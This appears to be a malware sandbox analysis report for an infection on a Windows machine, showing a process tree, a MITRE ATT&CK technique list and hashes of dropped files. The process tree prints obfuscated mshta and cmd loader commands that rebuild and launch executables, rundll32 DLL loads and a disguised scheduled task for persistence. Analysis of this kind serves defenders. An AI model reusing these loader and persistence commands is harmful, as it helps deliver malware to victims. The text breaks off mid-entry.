"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))
2⤵
PID:2420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"
3⤵
PID:3204

C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF
4⤵
- Executes dropped EXE
PID:4616

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))
5⤵
PID:4872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"
6⤵
PID:4380

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))
5⤵
PID:5392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t
6⤵
PID:4656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
7⤵
PID:6040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"
7⤵
PID:6320

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\PEQQN6S.OU
7⤵
- Loads dropped DLL
PID:6692

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im "Wed094c47c32b.exe"
4⤵
- Kills process with taskkill
PID:4812

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2728

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6868

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:7136

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6136

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:5652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:2904

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:10060

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:10204

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6504

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:9324

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 32DD8EC0033C5BB6914F7E0C9134E034 C
2⤵
PID:9700

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8746C86701AA3D2FBC1D0399E2D949B0
2⤵
PID:8484

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:10208

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B8665714DE28BBC0EC345CEFDC51E12E E Global\MSI0000
2⤵
PID:5028

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8152

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8504

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8804

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9816

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:9768

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:9444

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8304

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:4360

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6152

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:4664

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:4436

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:8260

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
3⤵
- Creates scheduled task(s)
PID:9412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5080

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6820

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8660

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3084

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10220

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8344

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
1⤵
PID:9184

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"
2⤵
PID:8768

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:9060

C:\Users\Admin\AppData\Roaming\eedjhfw
C:\Users\Admin\AppData\Roaming\eedjhfw
1⤵
PID:9248

C:\Users\Admin\AppData\Roaming\eedjhfw
C:\Users\Admin\AppData\Roaming\eedjhfw
2⤵
PID:8508

C:\Users\Admin\AppData\Roaming\fcdjhfw
C:\Users\Admin\AppData\Roaming\fcdjhfw
1⤵
PID:9372

C:\Users\Admin\AppData\Roaming\aidjhfw
C:\Users\Admin\AppData\Roaming\aidjhfw
1⤵
PID:9456

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:6120

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:9836

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:10180

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7252

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6528

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6880

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:7248

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:7632

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:9160

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:9348

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6268

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9408

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9844

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:9968

C:\Users\Admin\AppData\Local\e1385b57-9353-424f-b646-b905838e3d41\EE1.exe
C:\Users\Admin\AppData\Local\e1385b57-9353-424f-b646-b905838e3d41\EE1.exe --Task
1⤵
PID:1908

C:\Users\Admin\AppData\Local\e1385b57-9353-424f-b646-b905838e3d41\EE1.exe
C:\Users\Admin\AppData\Local\e1385b57-9353-424f-b646-b905838e3d41\EE1.exe --Task
2⤵
PID:680

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:9356

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:7940

C:\Users\Admin\AppData\Roaming\eedjhfw
C:\Users\Admin\AppData\Roaming\eedjhfw
1⤵
PID:6348

C:\Users\Admin\AppData\Roaming\eedjhfw
C:\Users\Admin\AppData\Roaming\eedjhfw
2⤵
PID:9016

C:\Users\Admin\AppData\Roaming\fcdjhfw
C:\Users\Admin\AppData\Roaming\fcdjhfw
1⤵
PID:9728

C:\Users\Admin\AppData\Roaming\aidjhfw
C:\Users\Admin\AppData\Roaming\aidjhfw
1⤵
PID:4676

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:1500

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9496

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9760

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:8744

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:7972

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:6120

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:8164

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7720

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:8856

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:8692

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:9840

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2496

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6380

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:900

C:\Users\Admin\AppData\Roaming\aidjhfw
C:\Users\Admin\AppData\Roaming\aidjhfw
1⤵
PID:10136

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:5988

C:\Users\Admin\AppData\Roaming\fcdjhfw
C:\Users\Admin\AppData\Roaming\fcdjhfw
1⤵
PID:5716

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
46a257139703fcdd345684ad452d9d60

SHA1
42a6e00138aeb39b54fc13fadb4d6ac950c692c9

SHA256
20b8064c496ec36797579dd2de230bffd84994a0e2a94a67bd58188bdaecf3af

SHA512
2b44ba2c18b1170e7b7a3802fcb88801b77eaf1aff13a2b3a44cac18e47f11a0e0b25a01707911076c9b3c74d827c813f0d8a4c467f07de5d2b2140f80b90d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.exe
MD5
af05a2ab843ad9b5fc1cbd080c935b68

SHA1
af6a92f75ca457cdb5cbfc732b7d087063da476c

SHA256
272fad52f0b598d1a3213f089c58aa61211080d00c5ae7ede8fc63460c4bfb99

SHA512
ab0536f53e8882a96fc2664648e76bdd75c839167cf9a27a89279d71681074a4acd92a1bd526e9fcf58544dac24146585a21633a23d97e7166e57d003d5311cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
MD5
199dd8b65aa03e11f7eb6346506d3fd2

SHA1
a04261608dabc8d394dfea558fcaeb216f6335ea

SHA256
6d5f838b8826f5fcfc939db18f02b7703b37f9ecab111bda1aeca6030dd3aa13

SHA512
0d28ba3232fac0caccc63c0b287ddd81bbc8493d8ec6d90b74f6a3d490903efb2e561cb62e6c9bae94f3bf81d6b298f72c02475f13b775312541ea579e2c4228

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
MD5
199dd8b65aa03e11f7eb6346506d3fd2

SHA1
a04261608dabc8d394dfea558fcaeb216f6335ea

SHA256
6d5f838b8826f5fcfc939db18f02b7703b37f9ecab111bda1aeca6030dd3aa13

SHA512
0d28ba3232fac0caccc63c0b287ddd81bbc8493d8ec6d90b74f6a3d490903efb2e561cb62e6c9bae94f3bf81d6b298f72c02475f13b775312541ea579e2c4228

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
MD5
199dd8b65aa03e11f7eb6346506d3fd2

SHA1
a04261608dabc8d394dfea558fcaeb216f6335ea

SHA256
6d5f838b8826f5fcfc939db18f02b7703b37f9ecab111bda1aeca6030dd3aa13

SHA512
0d28ba3232fac0caccc63c0b287ddd81bbc8493d8ec6d90b74f6a3d490903efb2e561cb62e6c9bae94f3bf81d6b298f72c02475f13b775312541ea579e2c4228

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
MD5
199dd8b65aa03e11f7eb6346506d3fd2

SHA1
a04261608dabc8d394dfea558fcaeb216f6335ea

SHA256
6d5f838b8826f5fcfc939db18f02b7703b37f9ecab111bda1aeca6030dd3aa13

SHA512
0d28ba3232fac0caccc63c0b287ddd81bbc8493d8ec6d90b74f6a3d490903efb2e561cb62e6c9bae94f3bf81d6b298f72c02475f13b775312541ea579e2c4228

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed094c47c32b.exe
MD5
b5cfd3a9dc9e645e24c79991bca60460

SHA1
0d6bcdca2121d279bbe87c66cab515ac2478f555

SHA256
852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768

SHA512
55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed094c47c32b.exe
MD5
b5cfd3a9dc9e645e24c79991bca60460

SHA1
0d6bcdca2121d279bbe87c66cab515ac2478f555

SHA256
852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768

SHA512
55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed096a1bff61.exe
MD5
c4d0ec0c74d01acc7135e8045630b182

SHA1
d954fa19b63df6062c013093ed22f8dc5218c48b

SHA256
8d3586126ec20da9b63930b9995d9ad9826540a71fb958431b73ff48ff6b18e2

SHA512
7cc8d2d033447eed31a1ccab040a4b52803f483d7957c488ad2165db4a308b5cf84f8e2420717436bb146e6e5d33b5d65a53b2381e3caec14b092562b940a9ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed096a1bff61.exe
MD5
c4d0ec0c74d01acc7135e8045630b182

SHA1
d954fa19b63df6062c013093ed22f8dc5218c48b

SHA256
8d3586126ec20da9b63930b9995d9ad9826540a71fb958431b73ff48ff6b18e2

SHA512
7cc8d2d033447eed31a1ccab040a4b52803f483d7957c488ad2165db4a308b5cf84f8e2420717436bb146e6e5d33b5d65a53b2381e3caec14b092562b940a9ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0971f17486f8.exe
MD5
83be628244555ddba5d7ab7252a10898

SHA1
7a8f6875211737c844fdd14ba9999e9da672de20

SHA256
e86ad9f9c576959b71ef725aaf7d74c0cf19316e1afbda61a8060d130e98fb3f

SHA512
0c09cce580cd0403191a3944f37688c079d79a21dccb014ac748620835eac542a5327a4e325a3dab0cd6c3bd0db6cb523f51bd05b027596e0b8199d0503b78e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0971f17486f8.exe
MD5
83be628244555ddba5d7ab7252a10898

SHA1
7a8f6875211737c844fdd14ba9999e9da672de20

SHA256
e86ad9f9c576959b71ef725aaf7d74c0cf19316e1afbda61a8060d130e98fb3f

SHA512
0c09cce580cd0403191a3944f37688c079d79a21dccb014ac748620835eac542a5327a4e325a3dab0cd6c3bd0db6cb523f51bd05b027596e0b8199d0503b78e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0971f17486f8.exe
MD5
83be628244555ddba5d7ab7252a10898

SHA1
7a8f6875211737c844fdd14ba9999e9da672de20

SHA256
e86ad9f9c576959b71ef725aaf7d74c0cf19316e1afbda61a8060d130e98fb3f

SHA512
0c09cce580cd0403191a3944f37688c079d79a21dccb014ac748620835eac542a5327a4e325a3dab0cd6c3bd0db6cb523f51bd05b027596e0b8199d0503b78e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09977fdc12334.exe
MD5
6843ec0e740bdad4d0ba1dbe6e3a1610

SHA1
9666f20f23ecd7b0f90e057c602cc4413a52d5a3

SHA256
4bb1e9ad4974b57a1364463ca28935d024a217791069dd88bedccca5eaad271a

SHA512
112a327b9e5f2c049177b2f237f5672e12b438e6d620411c7c50d945a8a3d96ec293d85a50392f62651cdf04a9f68d13d542b1626fb81b768eb342077409d6d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09977fdc12334.exe
MD5
6843ec0e740bdad4d0ba1dbe6e3a1610

SHA1
9666f20f23ecd7b0f90e057c602cc4413a52d5a3

SHA256
4bb1e9ad4974b57a1364463ca28935d024a217791069dd88bedccca5eaad271a

SHA512
112a327b9e5f2c049177b2f237f5672e12b438e6d620411c7c50d945a8a3d96ec293d85a50392f62651cdf04a9f68d13d542b1626fb81b768eb342077409d6d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09abf83d9c2.exe
MD5
03137e005bdf813088f651d5b2b53e5d

SHA1
0aa1fb7e5fc80bed261c805e15ee4e3709564258

SHA256
258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd

SHA512
23bbb89fe88264538461c0eae1437344e9823e245d00f0527424b95d4ca54054c8b411db3c066664617e0df69d1468ff10385841a5f1869a0e480a92abffdddd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09abf83d9c2.exe
MD5
03137e005bdf813088f651d5b2b53e5d

SHA1
0aa1fb7e5fc80bed261c805e15ee4e3709564258

SHA256
